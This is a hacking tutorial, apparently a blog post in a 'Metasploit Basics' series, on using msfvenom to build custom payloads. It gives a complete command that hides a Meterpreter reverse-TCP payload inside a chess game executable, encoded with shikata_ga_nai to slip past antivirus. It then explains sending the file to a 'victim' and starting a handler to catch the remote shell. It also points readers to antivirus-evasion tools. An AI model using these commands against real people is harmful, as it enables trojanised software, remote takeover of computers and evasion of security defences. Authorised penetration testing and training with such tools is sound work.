• OTW

Metasploit Basics, Part 9: Using msfvenom to Create Custom Payloads


At times, we may want to create a custom payload (for more on Metasploit payloads, see Metasploit Basics, Part 3: Payloads). For instance, we may want to embed a payload/listener into an application or other malicious software that we hope the target clicks and we can take control of their computer. This is exactly what msfvenom is designed for.

Previously, to re-encode a payload in Metasploit, you had to pipe (|) msfpayload through the msfencode to create a custom payload. In 2015, Rapid7, the developers of Metasploit, introduced a new command that takes the place of the clunky combination of msfpayload and msfencode to streamline the process of re-encoding a Metasploit payload. This new command standardizes our command line options and improves speed.

Let's take a look at msfvenom in our Metasploit Basics guide here.

A Quick Note About Re-Encoding Payloads

Re-encoding a Metasploit payload has often been touted as way for evading AV and other security devices, but the people who develop AV software are not stupid. They have now found ways to detect even a re-encoded payload from Metasploit.

Now, rather than just look for the signature of the payload you have encoded, they simply look for the signature of the template that Metasploit uses to re-encode (these templates are at usr/share/metasploit-framework/data/templates). In this way, no matter how many different encoding schemes you use, the template has a signature and the AV software detects it.

Don't fret though, there are still ways to re-encode a payload that are still undetectable by AV software. Check out my series on Evading AV with;

(1) OWASP-ZSC

(2) shellter

(3) Veil-Evasion

Step 1: Fire Up Kali & Start Metasploit

Let's start by firing up Kali and opening the msfconsole. You can do that by simply typing "msfconsole," or you can use the GUI and go to Applications -> Kali Linux -> Top 10 Security Tools -> Metasploit Framework.

kali > msfconsole

When you do so, you will find yourself in this interactive Metasploit shell.

​​

​​​​​​​​​​

Step 2: See the msfvenom Options

Now, at the prompt, type "msfvenom" to pull up its help page (you can also use the -h switch to obtain the same screen).

msf > msfvenom

​​​​​​​​​​​​​​​​​​​​​​​

Let's take a look at some of the most important options in this list.

  • -p designates the Metasploit payload we want to use

  • -e designates the encoder we want to use

  • -a designates the architecture we want to use (default is x86)

  • -s designates the maximum size of the payload

  • -i designates the number of iterations with which to encode the payload

  • -x designates a custom executable file to use as a template

Step 3: List the Encoders

Encoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. In this way, we can obfuscate the intent of the payload. Metasploit has numerous encoding schemes, and we can look at these by typing:

msf > msfvenom -l encoders

Metasploit will then list all of the available encoders with each's rank and description.

​I have circled the shikata_ga_nai encoder and note that skikata_ga_nai is rated "excellent". "Shikata ga nai" is a phase from Japanese culture that loosely translates as "nothing can be done about it". Now that's the kind of encoder I want to use!​​​​​​​​​​​​​​​​​​​​​

​​​​

​Step 4: Platform Options

In msfvenom terminology, a platform is loosely an operating system or scripting language with a few exceptions, such as netware. When building our custom payload, we must build it specifically for the target operating system. We can see a list of all the possible target platforms by typing;

msf5 > msfvenom -l platforms

​Note that nearly every operating system is represented here from AIX to Android to Linux to OSX to Windows and nearly everything else in between. When building our custom payload we must select the proper target platform to be successful.

When we build our custom payload we can use the --platform <targetplatform> syntax to designate our target platform.

​Step 5: Formats

Next, let's take a look at the formats our payload can take. We can list them by typing;

msf > msfvenom -l formats

As you can see, these are executable formats. If we scroll down a bit, we can see the transform formats.

When we build our custom payload, we will use the -f switch and designate the format.

​​​​

Step 6: View the Payload Options

We can use msfvenom to check the options that we need to set for any payload similar to "show options" in the Metasploit console. The command to check any payload's options is:

msf > msfvenom -p <payload name> --payload-options

So, if we want to check the payload options for the windows/meterpreter/reverse_tcp payload, we simply type:

msf >msfvenom -p windows/meterpreter/reverse_tcp --payload-options

When we do so, Metasploit responds like below.

​​​​​​​​​​​​​​​​

Now, if we want to work with this payload, we know what options we need to set in the msfvenom command. In this case, we can accept all the defaults, but need to set LHOST.

Step 7: Create a Custom Windows Executable

Now, let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and AV if we use a custom template. In this case, we will use a chess game named "chess.exe." The idea here is that we will embed the meterpreter payload into the chess game and then, when the victim opens the game to play chess, it will open a meterpreter session on their computer and connect to our system.

I have placed the chess game in the /usr/share directory on my Kali system.

To create a malicious executable with the windows/meterpreter/reverse_tcp embedded inside, we simply type:

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= <your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

​​​​​​​

​Where:

  • -p /windows/meterpreter/reverse_tcp designates the payload we want to embed

  • LHOST designates the local host

  • LPORT designates the port we want to listen on

  • -x designates the template we want to use and the path to it

  • -e x86/shikata_ga_nai designates the encoder we want to use

  • -i 200 represents the number of iterations

  • -f exe designates we want to create an executable (.exe)

  • chess.exe designates the name of the file create

Note in the screenshot above, I have circled the output that says "No arch selected". msfvenom defaults to x86, so if we want to create an x86 payload we don't need to add anything additional. Of course, if we wanted to create an x64 payload, we would need to add "-a x64" to our command.

Now, we need to send the chess.exe to the target.

When the victim clicks on the chess.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST).

For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.

msf >use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp

Conclusion

This new command in Metasploit, msfvenom, can streamline the process of re-encoding and embedding payloads. It is great at embedding payloads into various pieces of software, but is no guarantee for getting past AV software any longer.

If you are looking to become a Metasploit Expert, check out our upcoming Metasploit Kung-Fu course.

Also, look for my upcoming book "Metasploit Basics for Hackers" coming out early 2019.


20,202 views